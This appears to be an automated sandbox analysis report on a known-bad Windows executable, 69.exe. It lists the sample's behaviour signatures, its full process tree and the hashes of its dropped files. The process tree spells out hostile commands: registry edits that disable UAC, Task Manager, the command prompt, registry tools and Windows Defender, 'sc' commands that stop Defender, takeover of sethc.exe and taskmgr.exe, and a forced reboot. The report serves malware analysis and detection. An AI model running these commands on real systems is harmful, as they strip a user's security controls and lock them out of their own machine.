Analysis Overview
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Stops running service(s)
Possible privilege escalation attempt
Disables Task Manager via registry modification
Modifies system executable filetype association
Modifies file permissions
Executes dropped EXE
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-21 19:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-21 19:40
Reported
2024-09-21 19:41
Platform
win11-20240802-en
Max time kernel
9s
Max time network
25s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\unregmp2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1287768749-810021449-2672985988-1000\{0DB9049D-F888-42FF-A23B-8D95A9FFEB5B} | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69.exe
"C:\Users\Admin\AppData\Local\Temp\69.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
C:\PerfLogs\windows\exec.exe
"C:\PerfLogs\windows\exec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat C:\PerfLogs\windows\exec.exe"
C:\PerfLogs\windows\jumpscare.exe
jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
rnbowspam.exe
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\jumpscare.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\rnbowspam.exe"
C:\Windows\System32\icacls.exe
icacls "sethc.exe" /granted "Admin":F
C:\Windows\System32\icacls.exe
icacls "taskmgr.exe" /granted "Admin":F
C:\Program Files\Windows Media Player\wmplayer.exe
wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
C:\Windows\System32\takeown.exe
takeown /f reg.exe
C:\Windows\System32\icacls.exe
icacls "reg.exe" /granted "Admin":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\System32\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\takeown.exe
takeown /f regedit.exe
C:\Windows\system32\icacls.exe
icacls "regedit.exe" /granted "Admin":F
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004F0 0x00000000000004E4
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\shutdown.exe
shutdown -r -t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3936055 /state1:0x41c64e6d
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\timeout.exe
timeout /t 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
Files
C:\PerfLogs\windows\warn.vbs
| MD5 | 2f1738d26b35388f87f905ecc98cf408 |
| SHA1 | f1d20ac33b739f3d50d30891b743ef4374abbc5f |
| SHA256 | 83a4c5cf7db0f4de5d719209f7a76a16abae9cf990a9f8088d14f575cd94b0ba |
| SHA512 | e05c32f808a3a5e077b710623cab633a88aab12166ffaedbbd5906898fc1169ce1733bd40bb3b5b826f9a76ab0dfc640eddfd6e0b628b66d978d4c09f448c1f2 |
C:\PerfLogs\windows\exec.exe
| MD5 | 236f1bc0ecb98edb8efdc31da513e819 |
| SHA1 | 47cc4e73c0f6d717eba708cf468bf6ecb9970086 |
| SHA256 | 517c7ce47c1ce1f168e5965caed3904f2752a55355844c6ba2d83a093068d9d4 |
| SHA512 | e8256b5d89debbdfeff230bc580ea2db106077366631eb83eb65795d4817e9a0fb93ac90419363fafaa0a3cd38253147ae7459174d01b9f6f414176151958109 |
C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat
| MD5 | 47814c389b7e63ed5a13aa8dcc435f23 |
| SHA1 | 06f6fbfbeefaf56e651c2d4c4bf19f6adfe7dcd7 |
| SHA256 | 2e384305b1a2ee5dced93b6005f0bc99c9c2438b4d82674ff3c1d1ecfeec1f48 |
| SHA512 | 0cdacd5b894037ed33745f69d0820a6850e4cc11ac2e0ab0edb7a1bc699f296f2396fdce2005a859ca3c4e79a61a629a3fe378a060563b0a2291c32517254382 |
C:\PerfLogs\windows\jumpscare.exe
| MD5 | 5425f894a45d90bac30ff9a34d2ad2f3 |
| SHA1 | 3d9b9708b4eb917142e7fb59ba61534db2c84e7b |
| SHA256 | 5f4d940457f8e9ae0e3313e7850e510833cbedf5b04b4c6bcc2b8bb47c317be2 |
| SHA512 | 9cf7b0bdaca5a6d8571f2f79ebb51c41dd52bd8f0dad1e81ab9a6508a3207a669895e9113d2d4c110b0692ab7d6c7be31f22ac0f1b668fdab5e354e051af59e7 |
C:\PerfLogs\windows\rnbowspam.exe
| MD5 | e000d863f54529348b39030cbaf19aad |
| SHA1 | 9138d2cb83508bf24edee9cb581f60700a1c2b9b |
| SHA256 | 5fc50ced176ac39c74c605da6e6fe40e8083e36b680d31e844d6626f988245ea |
| SHA512 | 72dcb69e4a716420e3b6b4898a7cd92e658494ab5253b11f9c6f6aa8cc1017f8afa2ec306b36a6ffc8daedbd07a0b2247f96ca3e3ce50e13e2afeb47738f79df |
C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat
| MD5 | 5b094d5e0e750e15ab5628f608756249 |
| SHA1 | c73caec179b8baf3833413aaab31c384c48ccd45 |
| SHA256 | 5ce7469b14f3d4fb44c71359acbac51e6eb0ee7b0b002c0014bc9a46f6b91a3f |
| SHA512 | 5d6642ca13fe3951926d03f64ad56c360b73aa83c118b902254de9838198fed774604b977990523de555e9183fed716c4cd0edea65dcfe0c75962c0333c4849d |
C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat
| MD5 | 517cae8cc74a0ef3cff3ca7f7dc1aa34 |
| SHA1 | af1538a03dfa1678ab2117c715682527e22f2450 |
| SHA256 | a99b20d186ad773ebac7925995120c0d0dee09865b4278dc2017125fefcf8194 |
| SHA512 | 8180b499fdba191143306c9e296cd6f6e54068e2717c27072d2f09aa3744d763eb68c88b3377ff6139cecd526f609454da0223f2946a0452bc6e8868ec8cd573 |
C:\PerfLogs\windows\rainbow.bat
| MD5 | 9d25a94b77c178f0d19bdd8440aaaade |
| SHA1 | c732a091461e0ebbd69f6f64b70016e13856908c |
| SHA256 | 55163b3be4667284a55e90d0cfd95f5efb8092efa22d4f58e1390d8aecec59f9 |
| SHA512 | e2c0815d709223601520dfebb4707417fa8f465980b9c329a253894e02eab2f90d053fbb321ddb62d73be297cb42cb9a81553030dbeda187fa18c17f68245e8d |
C:\PerfLogs\windows\69rnspam.exe
| MD5 | 727793378d36b60cae54319b2f5e9e4d |
| SHA1 | 2171ea2f0ea01b39c71ea216a945816fa9ffe751 |
| SHA256 | b16e13c1d34e11e8a8318e405e4b90580802a1ee41489926785ab31fd822bcf2 |
| SHA512 | 66855458d7db3f181870aaebcae64025bb817f2b8f505189744fe3adf7f75a0f1d867192a870b75e33f36dae1006d764664ddd390fa5570a6de9f0108d5d0c91 |
C:\PerfLogs\windows\logon_overwrte.exe
| MD5 | f8df0742068fa14d5a4502de32acf41b |
| SHA1 | f862fcd7dafcafdf9e39c5c2d30c281d1bbc2cc0 |
| SHA256 | 9eaec2d603ae96e73a100713b5b77b8398d79049ab21013e6715fe3d6f1debcc |
| SHA512 | e894937999d9f13340d76cb0dbd3163d93e2a13f4dc66e6621a047a61691e8ecfcae29b36402c89ef3b9c7d60d415f62b259c1676701fe56c10a4d412506f186 |
C:\PerfLogs\windows\killrunas.vbs
| MD5 | fb63b21fb318509a75324b1037da7876 |
| SHA1 | ff2c5b8e4f5640ecb4dfb7749495cbd73cc94cf1 |
| SHA256 | 3917fe5595894dd1cae684f7a42b4454743b63c86f266218d474506c7ff12f05 |
| SHA512 | 03ed3b9c6f2c15a11ad4e113c0c757242e6ebae38c96cdf066082fdffc286e76183aaca6b1e323a20803ac368f75468c1ff797d498f651fcc00d8eabbe8329f1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
| MD5 | 90be2701c8112bebc6bd58a7de19846e |
| SHA1 | a95be407036982392e2e684fb9ff6602ecad6f1e |
| SHA256 | 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf |
| SHA512 | d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe |
